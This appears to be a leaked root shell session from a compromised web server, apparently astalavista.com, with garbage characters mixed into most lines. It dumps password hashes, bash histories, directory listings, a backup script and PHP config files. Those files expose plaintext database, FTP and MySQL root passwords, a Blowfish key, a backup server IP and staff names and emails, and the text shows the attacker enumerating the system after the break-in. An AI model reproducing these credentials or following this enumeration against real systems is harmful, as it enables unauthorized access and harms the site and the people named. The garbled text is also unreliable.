1 ^* e: o; {5 @) N) T/ N9 L8 Ijon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::# R' v: }/ N* S- J/ @
com1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::
. m8 ^$ Q* Z# Q% hastanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::
8 D/ q0 \" l, T: p$ v7 _ M$ X9 Y2 R \
sh-3.2# cat /etc/motd
- [+ q7 Y! z( l# ^# [#####################################################
5 T0 S. F) C, V- o/ }4 u2 E% {#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #
* C$ j5 j; @. i! a% o5 c2 }3 e# |__| [__ | |__| | |__| | | | [__ | |__| #- a& c+ O4 r; c! } S" ^
# | | ___] | | | |___ | | \/ | ___] | | | #
. S- s* S) O/ q# #
5 ? T+ G2 \; d#####################################################
|8 @1 p$ x% Z0 @9 P: J. B8 U( z- u# #
$ G8 T0 |" \" T* n8 l/ V3 \# Admin Contact - 链接标记support@secureservertech.com #
; T+ L m1 ^; L9 K! V. q# #! F8 H! V. q; y2 r: S
# Available ShortCuts #* y0 D) Q/ r5 [ O# ]9 D) r
# #: O0 q9 D( B+ o$ @, {% \
# nst - list active connections #2 z$ ]2 J6 l- \4 C4 i
# ddos - shows how many times each ip is connected #
9 S z; N% m# A! I( {8 h) \1 @# ltr - restart the webserver #
3 m$ ]( v3 I: v( p# ^$ J# phpc - edit the php config file #& r0 p, S [# O7 I: ]
# htc - edit the webserver configuration file #
3 p+ Q; t( R! r3 ^0 G) i9 [# up - uptime #4 c/ z' ?3 [( K x9 m8 d$ X
# etd - edit the motd of the day file #
, k4 K0 ^0 @# S& ~! i7 |# htr - start and restart apache if needed #- E7 r6 @7 B$ u& A8 p( O
# syng - shows active SYN_RECV connections #
/ y P2 J6 D9 R$ h6 _( e) z4 l: e# synd - syn flood blocker - “synd -h” for usage #
" z7 w! \8 Z R/ u: Q# [& b& J#####################################################
+ [- c3 u1 o( k8 ^8 B# NOTES: #
( i, C7 k& F& _5 y& k0 K4 B. r/ W# Last Upgrade - 12-08-2008 by JF #, F5 r- y9 K8 x3 y8 E
# My.cnf/Mysql Optimization - 1-28-09 #
3 z) H% C$ L' w$ X, k5 s9 r$ F$ R# #' e( E3 o( @4 K* G# ^( A+ N. Q
# #: V& x1 K2 E! P. j
# #" |! o! e# z- D
#####################################################( s5 ^- ]4 b. e! ~& G8 z! T/ j, I# q
+ t3 W' T9 _7 ^' }sh-3.2# lastlog | grep -v Never. K ^/ @* H1 U0 K
Username Port From Latest
4 A( J: \/ d6 C: G5 q8 u5 }# zroot pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 20094 d( A- D! q! e: j# k; {' `
admin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 20086 {: w! [ J% ~9 m. B
com pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 2009
0 Q8 c2 W5 R" ]! Dastanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 20098 |0 p' J( y( R
7 K5 Q- y1 m- J$ A
sh-3.2# ls -la
. S; r. ?1 J6 H8 X* z+ V7 Y! Qtotal 453376
# ~9 Z. C( o4 b9 _3 Q9 tdrwxr-x— 15 root root 4096 Jun 4 08:40 ./ _ H k* _$ ?( v; G
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..( E7 u" g! P5 p( ^0 M) G
-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip
X# g1 q3 W& `; S* j% [-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg
; y/ q- g& k' s- Y! m, E8 I-rw——- 1 root root 16836 Jun 4 07:21 .bash_history, @; L9 W* k, o$ c O
-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout9 g" ^! S& w E0 h0 l: W
-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile
) \2 l( X4 _% s8 n2 |0 P1 E# A/ J-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc
+ m$ Z5 J* n7 q. v( ?; Y* |! u-rwx—— 1 root root 1899 Oct 28 2007 bk.sh- P, K+ Q! L8 b% k2 I/ G3 g
-rw-r–r– 1 root root 1327 Nov 29 2007 cert
1 y1 H8 Q/ c8 B8 C-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql
& o# i2 t$ O: L$ D8 G% `7 ~( } udrwxr-xr-x 4 root root 4096 May 20 2008 .cpan
+ _9 m; s, e$ Y Y-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc
Y+ k1 d* ?$ X-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql8 N# m; T; M* }% i% C( {8 E
drwx—— 2 root root 4096 Oct 28 2007 .elinks0 s2 J, `0 n) X. D; E% C
drwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1. ^9 a+ |, G* g" }3 q8 y- v# @
-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2 N, i- g( `! h _
-rw——- 1 root root 0 Apr 16 13:19 .history
' A3 {/ R0 j) I8 z+ ~" y! H-rw-r–r– 1 root root 16095 Sep 11 2007 install.log
2 i y e( R" A% H& }3 L-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog2 w7 O' u% Y- O
-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh+ z) a# `+ d# _8 y- `" O
-rw——- 1 root root 35 Jun 2 14:23 .lesshst7 e2 w/ q( B5 V+ }3 R4 o
drwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp
' ?' {) z0 W o3 n0 xdrwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec
3 d& E I, i& a8 P-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz3 M% T+ c+ W' Z3 C
-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2
1 r2 q7 i0 o. ^& I! D# e, ~-rwx—— 1 root root 760 Sep 18 2008 lp6 g L9 G$ X3 V4 Y$ ~. T8 s5 R2 a
drwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.1
6 v6 o+ \4 o2 x-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz( A) A3 L8 l9 F& m v9 f3 |
-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1
4 p: T8 j+ T* q- n! Idrwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9$ L* T6 o" x `5 E* Y
-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz9 R3 l; y: U% k2 T* ?( d
drwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3
h! p( I4 _4 ?2 R6 t3 l1 x0 Z-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz' Z( g) k4 g6 P: L$ }/ f2 }+ {
-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh' k2 ~1 \. j# W: ?3 x" ^. K) Y
-rw——- 1 root root 41 Oct 19 2007 .my.cnf
2 K! M7 s# y; Q7 {' a! G$ b-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history
; d7 v6 |* n4 V8 R-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport- j* W' r# ^# t8 B9 c
-rw——- 1 root root 41 May 20 2008 .mytop3 F: X/ O2 K# ?# u
drwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.6$ M2 x; ^4 T; I* i
-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz
4 J) h& q1 Z& v8 n7 R( Z' v5 Sdrwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp& n2 B/ f4 I. Q& T6 N3 s2 Y
-rw——- 1 root root 1462 Sep 21 2007 opt.php0 i) O, D, L3 m( s# _) C' P: \
-rw-r–r– 1 root root 3371 Sep 22 2007 p) i+ G9 {/ F" j7 t9 t# a
-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz20 Q1 ?1 s3 S& O; @: R1 m7 A
-rw——- 1 root root 1024 Feb 3 21:32 .rnd$ _6 o# I* [- f" C9 } h" U
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
; l* M; A5 b6 L# L( F-rw-r–r– 1 root root 887 Nov 28 2007 server.key4 U, |5 Z1 u4 I
drwx—— 2 root root 4096 Oct 10 2008 .ssh: S2 {0 _4 p* H' T) A7 u
-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat
7 m+ t# C1 R% s-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc
4 ^& q" v* W! C+ {-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip* i+ l& ]1 S% ^4 z2 W
-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.1
; ~$ B( g8 J& d( C# a1 U0 X+ Ndrwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp
3 L7 P ~) q& ]* o-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh. Y, l( b, E; y0 _, g
drwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.0" c" k# V1 B7 }+ Z+ P7 g9 ]
-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz2
7 O3 a5 o1 L4 D: {' A5 h) T-rw——- 1 root root 12997 May 16 2008 .viminfo- `% L1 D6 d+ R; O
- e( Q- E0 M% b) P4 |
sh-3.2# cat .bash_history" t$ \6 z2 d9 K
[snip]6 K6 D) P& l+ W. t3 N% B
wget cp4sst.com/sstlinux.tar.gz
T( g O% i1 v! l2 Atar zxvf sstlinux.tar.gz P! P8 l$ U* o* p
cd linux-2.6.27.10
. n# D: F& ^, ~sh install.sh/ m0 I/ Y& ^9 X$ m- R
make bzImage ; make modules ; make modules_install ; make install6 C8 B% F9 s# c! w& ^/ T, ^
make clean
0 A1 Y! k9 s( \4 q( i9 Nservice mysqld restart
) w1 ~ ^; B( h) i$ T[snip]
& i1 ?0 \5 y0 k, X6 e* t1 ocd /usr/sbin/. o& t0 h; f9 j- n5 b
chmod 4777 traceroute
& ]2 o1 N4 m% X+ Mchmod 4777 ping
o4 |. Y0 t& h5 @; a0 l4 ktraceroute -I 链接标记[url]www.astalavista.ch[/url]
" B! I/ ^1 C2 t* Q' u[snip]% P, N9 Y" C. q6 }+ M; J9 o4 m
vi /etc/csf/csf.conf; I+ p8 \' E+ Z
traceroute google.ch
5 }- Y2 i1 _+ @' h d2 @ x$ Eservice csf restart
7 Q4 f# g, ?2 K" F& ~3 y/ ktracert google.ch
' h. `- d ]0 \5 Nservice csf restart
4 D( j* L% L3 y8 U1 ttraceroute 链接标记[url]www.google.ch[/url]0 Y6 n3 i. _" ` a: O4 ?! R
tracert 链接标记[url]www.google.ch[/url]8 a3 i9 t/ C# ~" a8 I! b
traceroute 链接标记[url]www.google.ch[/url]7 Q+ p0 P; F' N6 W/ r2 ~% E
locate traceroute
( @! c* S7 X4 qchown 4755 /bin/traceroute
9 ]2 m2 A ?: N( n0 u. uchown 4777 /bin/traceroute( B, o2 L; _2 S- V- T( P5 u
locate ping$ G5 L1 S$ ~6 D% ^1 r4 Z
chown 4755 /bin/ping- H! i) c- S, o# v, |
chown 4777 /bin/ping$ n% @! u/ L5 ^7 _- w; P8 j: f
cd /bin/
% `5 n7 V6 f+ Y4 }( `* D. zls -ali | grep ping2 A# P+ s% S: I/ w/ |
chown root ping7 C) }; D+ V2 X* b6 Y( w5 Z
chmod 4755 ping
. H) z: k# ]4 s- u! N# Ols -ali | grep traceroute+ ~8 o: y4 [; J2 l$ C4 E5 y
chown root traceroute6 M' f3 h' q& \1 H a+ V
chmod 4755 traceroute6 f* t" F8 l/ U5 X: F$ _/ U3 A
ls -ali | grep traceroute* u$ B. F( Y1 x2 T% v$ z( X$ P" Q" W# S( m
traceroute -I 链接标记[url]www.google.ch[/url]( n+ t2 w# ?7 Z/ P
traceroute 链接标记[url]www.google.ch[/url]
p1 { z6 A/ Pwhois pmsantos.ch
% |& Z) x- k5 p. m& R4 G[snip]
/ x, ]! S" I$ R1 A! X9 V8 ~1 Vmysql -h com_contrexx2_live < /root/defaultp_ports.sql
0 r6 F Q+ P* s8 p/ U8 Pmysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql' h- i/ a4 \5 z7 O( u* Z" p
mysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql0 T* q: \+ W$ T3 t \( b1 i/ Q' d
mysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql! I2 W3 ]7 O. g' y& t7 Y2 f1 f
top
8 a8 Y3 @- x7 l; bping ssth.ch
+ m4 w1 M& }2 l/ Qping asdlkfaljgasd???ljg???lasj.ch8 c6 c; d1 R6 G$ R
ping asdlkfaljgasdlasj.ch
; S) G7 |6 A( `2 ^7 E- x1 \ping 链接标记[url]www.ssth.ch[/url]$ O2 W0 ?6 b) P* d7 y Q, b
ping ssth.ch
1 x3 b) a8 O+ gnslookup 链接标记[url]www.google.ch[/url]
; U2 O E+ v, Z2 Pnslookup 链接标记[url]www.ssth.ch[/url]
0 z( T P$ K, S, r& vman nslookup3 w; y3 H) V4 o9 c* I
ping 链接标记[url]www.google.ch[/url]
3 M+ q3 G/ F c$ e7 A6 U; [* A, Anslookup 链接标记[url]www.google.ch[/url]2 b8 r n3 N% c- d2 v& H) H4 K
nslookup 链接标记[url]www.google.ch[/url]
' h* l1 y0 U0 n0 tnslookup salfjasdlf.ch3 G4 L' ~( G/ |% r+ J f
[snip]3 ]& x( |1 ~6 H9 J( o/ w' g
openssl passwd -1 sadf
; T+ a" X; w. Aopenssl passwd -1 5cZNHstdTy- d1 G% G# W. \4 C5 W# o1 ~; U6 f* D& P
mysql
( J! J7 q7 A7 O0 p4 K1 _; lmysql8 Q# M0 p; a. T& b; ]
locate proftp0 H# R! f E* V5 d! N1 m- E" e
vi /etc/proftpd.passwd u& r: L+ W. j1 R4 W: Z" V3 x4 M; K
service proftpd restart
" a6 A' ^- K+ y9 i. l7 a/ |8 hlocate proftpd.conf0 O" B# J7 b7 L8 l& S4 |
vi /etc/proftpd.conf
2 U3 e% n0 Y8 s' O( Rvi /etc/proftpd.passwd# ]9 R' s% d6 S& }1 Z0 s
service proftpd restart' t" d: ?, P. j9 D, N) b" ]
[snip]6 Y! p. S' V& l, ?( @
/bin/sh /home/com/backup_system/backup.sh3 T( R D; |% y1 o
tar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin
8 P# o- h# m3 V* Kmysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql: f x' S1 t }# r
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql
4 Z. v m% R$ @/ v3 S8 Als -ali
7 M F, Z$ e8 K0 h( J6 zmysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql
* D# M+ m1 T8 N2 l! v. G0 Q3 }mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql
9 {7 }- N0 Y& L& ncrontab -l
! T- P: M# U0 r2 q6 i1 u# O1 ]% scrontab -l: a- F8 F- F5 _
php -q /home/com/public_html/modifications/cronjobs/securitynews.php" F) O2 [' M; e5 v
/home/com/public_html/modifications/cronjobs/exploits.sh
: ^- {# _0 j2 |5 i3 v9 j4 Ewget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]+ \4 k- v% Z7 q4 C/ m$ R
tar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz: v; o1 C l( N/ c- E R
cd lsws-4.0.3! q1 C3 N7 i$ a, N3 V% l
sh install.sh
% U+ }) r Y# _. quptime
( L/ u- U' B: g' K" m$ Qhdparm -tt /dev/sda- S4 K9 H3 s \, ]+ N4 J0 {5 v3 K
iostat! k2 \. r: S& q7 K/ F
yum install iostat/ A9 a8 L( U _( n# E$ Z
iostat
6 B4 K; c5 s8 f( lwhereis iostat" P. U' L2 w3 u( R5 C: R8 ?5 y
yjm clean all6 U% Q4 M, t* _6 G! x
yum clean all ; yum -y update$ y- b" L9 Z9 ?! c0 b( Z
iostat
( g0 ^$ h& Z" V; Cyum install systat
7 g; f' X9 q3 _# b7 U [" Arpm -qa | grep iostat
: Q4 s& Y: [) `0 P6 Erpm -qa | grep sysstat
% j1 {' ~- U6 i8 }* ?5 drpm -qa | grep systat2 [# `5 d) A0 U, B, U1 n
dmesg -c
3 F( Y' x5 U- {) k7 U- xsysctl -p; z$ v" s- }9 I- D, A% ?7 e
uname -r5 ]2 N0 x$ R0 K3 L/ g
cd /usr/src7 d! y1 w! Y! _+ l
wget nix101.com/kernels/sstlinux.tar.gz
. c8 w3 i8 ^7 \! C M9 q" f& K9 @5 Qshutdown -r now
4 `. L& D, W9 z: R: Hnano -w /boot/grub/grub.conf, S3 @8 }' w, }6 ?
5 i1 s* L; y' h' g3 C# ssh-3.2# cat .my.cnf; ?) T [0 l) P# q) H
[client]3 A. W8 K+ I4 l* D6 W( O
user=da_admin
2 x# N0 d. Z3 K) c1 T7 Lpassword=X9dctmRH+ V* _% p5 \1 q4 {8 i
" q) u2 q/ Z0 P
sh-3.2# cat /home/com/backup_system/backup.sh
; Y' F- U$ Z' R5 s#!/bin/sh
% U7 f o& v) U2 G* f# f##################################################################### N/ ], R x+ c. K$ T
# #
' `( s7 r4 N8 t4 P1 A# incremental backup for astalavista.com #
" n2 ?8 C' a! K% y0 o* S# #
( `/ j, @) v& `& Q G# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #
' j$ j! a" w" _+ _- z- r& }# Q# #9 l _! |7 c& @. @. b
#####################################################################
6 W! B. P3 n/ x0 ]$ B# i3 c: W f[snip]
& ^" X6 i! U6 d7 {+ ^& F% hPROG_DIR=”/home/com/backup_system”;+ `5 s9 ?% K( v+ ^& w; [) S, k2 M& n$ ?6 c
BACKUP_DIR=”/home/com/backups”;
. i* m1 \' O$ F/ z( ~/ b; h% E7 hDOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;
G N% a' N4 R# ftp for synology backup server
( n& H* d0 d: S7 lFTP_HOST=”212.254.194.163″;9 @/ @! |& J& ?' r
FTP_PORT=”21″;6 s: W- S. Y$ H$ o
FTP_USER=”astalavista.com”;
0 Z7 _8 i i# k: uFTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;
* M+ U- I- k1 v& P3 S( N3 _FTP_DIR=”/astalavista.com”;
$ p3 U: Q9 {( M- t. }' U% x# database
' R. @+ k7 s' {! TDB_HOST=”localhost”;/ m/ |" W+ k3 E: N, r& ^2 i( E- K2 o
DB_USER=”contrexxuser2″;
' Z1 A8 \+ d# L/ o1 BDB_PASS=”0fEYNZgXz1pKe”;# v6 g7 I! G8 S+ m
DB_DATABASE1=”com_contrexx2_live”;5 G4 }, n6 {( F# D5 R, {
DB_DATABASE2=”com_contrexx2″;
" @1 H/ j, K) z1 l7 X$ g[snip]
- } r" }. L, @; J3 S# ^2 Hftp -in $FTP_HOST $FTP_PORT <<EOF
1 P1 X9 u, t' u6 B, I: c. Kquote USER $FTP_USER
) q+ |! Z8 W& o6 uquote PASS $FTP_PASS
0 B3 j2 {, G$ mcd $FTP_DIR P# `$ l. A0 q0 H+ C6 U) n& y$ i
put $DB_FULLNAME-SQL_Dump.tar
# p& Q( e5 A" U# x& X; Mput $BACKUP_FULLNAME-Public_HTML.tar
0 s/ v* a/ L7 i0 j7 y: G8 B# C" xclose
. Q0 u9 v2 K* u6 F- l0 L0 }bye. g. }0 I$ V+ X8 s4 f5 j( y; Y
EOF
) h$ a6 `. Y3 e9 A( d/ S
, e! u* l$ ?$ @' l- Q1 xsh-3.2# cd /home
5 u; @& e) B: x' G3 u8 v8 L7 j3 Hsh-3.2# ls -la
Y8 x1 z$ V' o# m' C; T3 mtotal 120
8 O7 F! k1 `1 K- t% Mdrwxr-xr-x 14 root root 4096 Mar 11 17:56 .
% z8 f. z7 E2 xdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..9 {2 O) C& V6 L) R! z" u: g2 a
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin: w' x# g( ^% `/ H8 W/ e5 y
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group! }3 R. z) c( o: U$ n5 V6 d
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user$ f$ E- u" @) a$ ^) C9 z C
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
* O- n3 U6 l _ O; }, {3 o0 q1 |drwxr-xr-x 2 root root 4096 Jul 29 2008 backup
$ r: d& ~* J$ Bdrwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
9 P* V U2 }# ~: ^) Jdrwx–x–x 10 com com 4096 Apr 28 12:40 com
: X+ l! M3 d8 D8 q( y( Sdrwxr-xr-x 2 root root 4096 May 17 2007 ftp
" |* W# m; J0 F, c; q+ Gdrwx—— 3 jon jon 4096 Sep 21 2007 jon
9 n; v7 v p! i7 rdrwx—— 2 root root 16384 Sep 11 2007 lost+found; o( T, |/ P! l( a* b
drwxr-xr-x 2 root root 4096 Sep 14 2007 my7 M) G/ U5 [) U" G) Y
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata0 h5 [% s& x& y
drwx—— 2 jon jon 4096 Sep 15 2007 test
, L4 @$ p. P5 r5 a+ hdrwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
9 K! D6 \9 J4 v/ H+ o) B- E. L* |. s6 l$ M' S9 V) J
sh-3.2# cd admin
7 }: |' k3 m9 J+ F$ v/ W+ n+ tsh-3.2# ls -la3 |! M3 h, R. w
total 1735896
2 x' f2 u5 x7 A \+ t# qdrwx–x–x 9 admin admin 4096 Nov 28 2007 .
% B9 p( `% L9 j, `" Ydrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..3 y. J% k* q+ ^: U7 V
drwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups
8 C1 k+ P) U7 Z2 Xdrwx—— 2 admin admin 4096 Sep 28 2007 backups! x r& f) q( m' m! _
-rw——- 1 admin admin 860 Sep 17 2008 .bash_history5 q+ F9 \4 r5 i W) j& a; h! _6 k
-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout
0 A3 v+ Q4 ^/ I-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile
; j! a) w- ?4 r; E: e+ @-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc
% r6 g$ J8 b" o9 @9 kdrwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups4 l7 N; _, L# [" o( S
drwx–x–x 6 admin admin 4096 Sep 21 2007 domains% l' A. T; {$ t$ W6 R
drwxrwx— 3 admin mail 4096 Sep 21 2007 imap
# R( `$ @. {( J% p/ `' S-rw-r–r– 1 root root 24 Sep 21 2007 info.php
) s! [! D s1 h/ f jdrwx—— 2 admin admin 4096 Sep 21 2007 mail: M( [% e$ f. L
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
* c9 R( f. ^4 J1 {# A7 b-rw-r–r– 1 root root 887 Nov 28 2007 server.key
; {; d9 l, @& Y7 J F' S" T-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow* F- C) o" S7 o- w6 V
-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz( @' ~/ |: z0 }5 v. G
drwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups
3 i* o5 u$ ? q: H/ B$ r) L7 T: ?" e" I1 Z1 {: i) D
sh-3.2# .. ^ p! R4 D$ M3 o
sh-3.2# cd jon6 k- |* N s; s5 d5 [+ F
sh-3.2# ls -la- S1 `: Q N1 S
total 36
! O( g& ~- I0 F5 h' n5 x. k. ddrwx—— 3 jon jon 4096 Sep 21 2007 .+ w' T6 B6 d1 N5 h% s" `
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..5 z1 m2 m- ]2 `$ {" U; V
-rw——- 1 jon jon 53 Sep 21 2007 .bash_history- G- X: C ]! m; ]
-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout
9 Q3 {* U: |# j8 k7 d- u-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile: x1 l& M& _6 j% w( p
-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc
' d2 ^3 x2 N' y0 O-rw-r–r– 1 root root 24 Sep 21 2007 info.php
* i; ^7 A- B# Jdrwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html
5 @, J) b/ c1 e( c+ Q7 _8 C. q
sh-3.2# cd ..
t$ ]" `9 d; K* O6 jsh-3.2# cd test5 | j& V" O, ]1 w+ G$ S* g9 z
sh-3.2# ls -la
6 E# G) X# Z' L% k: B+ Qtotal 489 y3 |- k5 K- h- v' M# o6 o
drwx—— 2 jon jon 4096 Sep 15 2007 .; N. Z8 F2 F- Z6 s& q$ h8 A7 _
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..! B$ K2 H1 v1 u- R8 a: \
-rw——- 1 jon jon 79 Sep 21 2007 .bash_history
5 C( @) ~' r: B4 e: o-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout
' ~6 [- t' f$ H& }, v+ P* l-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile! {2 T$ x+ c S& S1 r
-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc
) i! T0 n3 j+ ysh-3.2# cat .bash_history
8 Q0 ^" P$ I& S" Y/usr/bin/mysqladmin -u root password PoliuJhytg67
3 n" f' u6 `0 v
5 o7 s" K* o7 S! V+ Lsh-3.2# cd ..
' ]% `. N T0 ~: U; Wsh-3.2# cd astanet/ E ]2 h: i% [2 Q5 R
sh-3.2# ls -la# c6 G3 a: F! `' I% i
total 52
7 H; l! L( @+ Ddrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .$ Z- h; C! r1 g' d) n
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
; c$ K- K/ C4 \6 j5 {drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
M( d1 Z. L! k) p# g+ @* q-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history) L9 ]( |. L. q% G
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
3 J+ H7 O/ ~& z% n- g-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile
2 `3 T# G# B/ d1 E8 w8 U. N-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc; _4 z. g4 m. C }) y* U# v! {- q7 B
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains/ O9 f! Z4 w7 _
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap
$ k) x( U @$ ldrwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
! i; j) z Z8 A-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history
1 ]0 d7 J z* f" o( vlrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html) b" q. a I! d m8 M; C
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow6 F; s: c8 v' j. B; u5 D) L% ~. l
- m" j5 t. R! T% E, W" n
sh-3.2# cd auth/+ u6 Q" R( e, |0 s
sh-3.2# ls -la
$ _$ Y& h) y) |3 q6 k2 `3 Etotal 28
& f4 H' O5 w# Odrwxr-xr-x 2 root root 4096 Dec 23 16:00 .. P/ F2 T( V2 Y6 L1 s; b
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..) S8 H+ y* B! h2 F7 t" l' s% e& J
-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php% [/ c; k4 h/ x/ j2 S' U
-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php
0 k, B! [* l7 J/ k-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd$ `5 H: C, U0 U' w' r% X; s& F
-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting
! y8 e* a( K4 Y9 q( F3 P3 }-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd& P) b" g& T0 n
& ]. S- j5 d8 L4 i& z# t
sh-3.2# cat hackercontest.config.inc.php2 a% Z7 ]. X+ Z6 n
<?PHP
2 i; l9 a% E& s8 ~6 R// Variabeln f?r Verbindung zur Datenbank //: f: ^1 j0 ]7 w9 M" D/ Y% y* W l
$conxHost = ‘localhost’; // MySQL hostname& L& A- l% U8 f
$conxUser = ‘hackercontest’; // MySQL user
+ H1 P1 c: d! o0 Z& c$conxPassword = ‘K6m@7dUc’; // MySQL password
0 z7 R2 R! N3 y5 h+ x0 t( [$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish: H3 P* |* R* O
?>! o1 E$ m# r+ ^! Q! \
sh-3.2# cat hosting.config.inc.php, E' g4 V0 O* a0 u( z$ [
<?PHP1 t- I8 E$ c" S' `5 b
// Variabeln f?r Verbindung zur Datenbank /// p# j6 B2 Y& O+ h1 A1 T8 \
$conxHost = ‘localhost’; // MySQL hostname
v1 a7 a7 i q6 Y$conxUser = ‘hostinguser’; // MySQL user
+ z+ J' {, Y* Y$conxPassword = ‘cXvB3981′; // MySQL password' |- s4 D6 G+ O6 p( H$ w
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
